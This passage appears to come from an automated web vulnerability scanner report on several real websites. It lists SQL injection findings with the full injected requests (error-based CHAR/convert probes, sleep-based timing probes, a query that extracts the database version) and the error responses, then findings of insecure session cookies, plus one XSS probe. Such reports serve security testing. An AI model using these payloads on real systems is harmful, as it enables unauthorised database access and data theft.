GET /default.asp?message=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=BFNPJKACJHGOFCEJLNCGHIKK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2404
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:34 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
11.5. http://login.vindicosuite.com/vindico_dynamic.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://login.vindicosuite.com
Path:   /vindico_dynamic.asp

Request

POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate
Content-Length: 186

password=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&username=Smith

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:31:20 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
11.6. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=slhdu6ps008c709l4olril4430
Accept-Encoding: gzip, deflate
Content-Length: 119

btnCancel=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:30:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3810
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
11.7. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /index.php

Request

POST /index.php HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=todvqp9ae2pb55so66dlntmpe4
Accept-Encoding: gzip, deflate
Content-Length: 115

btnLogin=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&txtEmail=netsparker%40example.com&txtPassword=3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:52:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5083
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
11.8. http://www.angege.com/links.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.angege.com
Path:   /links.php

Request

GET /links.php?data=rSe_2%2F%7B02%253%21%2F0%29%24S%5C7%5ElPah%5ErcY%5Eh%24%5Dm%5C%5Eb%27%29%2B%2C2%FE%2A+igN5%2B%276%22%28%2F%2C5+%2C&serverfile=popdirect&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&subid=117412&tid=1288057764&clater=0&m=127&o=1&c=32767&a=32767&q=6&s=%3C%3D&ah=10&al=2&l=english&campaign=3&rurl=http%3A%2F%2Fads.lzjl.com%2FnewServing%2Fclicktrack.php%3Fcpx%3Dcpv%26qid%3D1288057764390track&defurl=http%3A%2F%2Fads.lzjl.com%2FnewServing%2Fcpalinks.php%3Fqid%3D1288057764390track%26memkey%3D98b14fa99412193eba9071f7c8c32be7%26clck_sid%3D4620%26clck_pid%3D2860 HTTP/1.1
Host: www.angege.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:45:51 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.4
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 226

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
...[SNIP]...
11.9. http://www.caribbean-ocean.com/get-image.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Request

GET /get-image.php?id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:03 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 1166
Content-Type: image/jpg


Warning: mysql_query(): Unable to save result set in /home/chroot/home/james/safari/mysql_driver.php on line 55
1062: Duplicate entry '_!@5.0.45-community-log_!@:1' for key 1<br /><br /><textarea row
...[SNIP]...
11.10. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scout.com
Path:   /2/a.z

Request

GET /2/a.z?cfg=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&fromprefetch=1&p=26&s=143 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:56:57 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:06:57 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
11.11. http://www.scout.com/a.z  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scout.com
Path:   /a.z

Request

GET /a.z?s=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:58:26 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 34 ms
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:08:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
11.12. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.socialfollow.com
Path:   /button/image/

Request

GET /button/image/?b=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>FireHost Protection</title>
...[SNIP]...
12. SSL cookie without secure flag set  previous  next
There are 17 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

12.1. https://broker.gotoassist.com/h/lbmc  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question= HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: http://www.gotoassist.com/ph/lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dtsSession=SessionInfo%3D237919200%253A316A1A5A2614CFC; path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8818

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
12.2. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribe.php HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2nk15qm3tn7surn8vvl1ofsf05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 307
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ri
...[SNIP]...
12.3. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1=1304753251678&time2=1304754493643&prev=http%3A%2F%2Fburp%2Fshow%2F19&referer=http%3A%2F%2Fwww%2Eexpedia%2Ecom%2FHTX%5FFLTFLEX%5FCALENDAR%2Ehtml&height=1200&width=1920&custom_var=80312807C795402E93C5016D2A2A3E1B| HTTP/1.1
Host: secure.opinionlab.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 02:48:21 GMT
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDQCRBQCAC=NDNBDONBCBPKEFFJPEOEPEHB; path=/
Vary: Accept-Encoding
Content-Length: 8271

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
12.4. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:58:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=a0np6gkb2vcuhnhijhucu86910; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
12.5. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=523ir1s45tqff5eslbctb6ta86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
12.6. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:54:04 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
12.7. https://subscribe.haymarketmedia.com/scm/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scm/?form= HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y3mspj55lrmqru55pqpftdmj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:16 GMT
Content-Length: 5394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
12.8. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0 HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:49:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Sun, 08 May 2011 00:49:42 GMT
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Set-Cookie: SWIFT_sessionid80=dxzxxi50ag628l80x5yuzob4lbj3yre8; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 11601

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
12.9. https://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.clone-systems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:30 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=sea1lu7lraticbpq2b4jg4uup4; expires=Sun, 08-May-2011 00:55:30 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Sat, 14 May 2011 00:55:30 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 191
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'https://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           
12.10. https://www.clone-systems.com/stylesheet.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.clone-systems.com
Path:   /stylesheet.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheet.php?cssid=31&mediatype=screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.clone-systems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:04:33 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=0fq4i44s8389og2150hod7eo10; path=/
Expires: Sat, 07 May 2011 04:04:33 GMT
Cache-Control: public, max-age=10800
Last-Modified: Sat, 07 May 2011 00:54:52 GMT
X-Powered-By: Nette Framework
Etag: "f1688bee3cc8398af5a80c595e645816"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css; charset=utf-8
Content-Length: 2811

/* Start of CMSMS style sheet 'Accessibility and cross-browser tools' */
/* accessibility */
/* menu links accesskeys */
span.accesskey {
   text-decoration: none;
}
/* accessibility divs are hidde
...[SNIP]...
12.11. https://www.taxnotebook.com/Login/PopupMessage.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /Login/PopupMessage.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login/PopupMessage.aspx?usr=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000341)%3C/script%3E HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
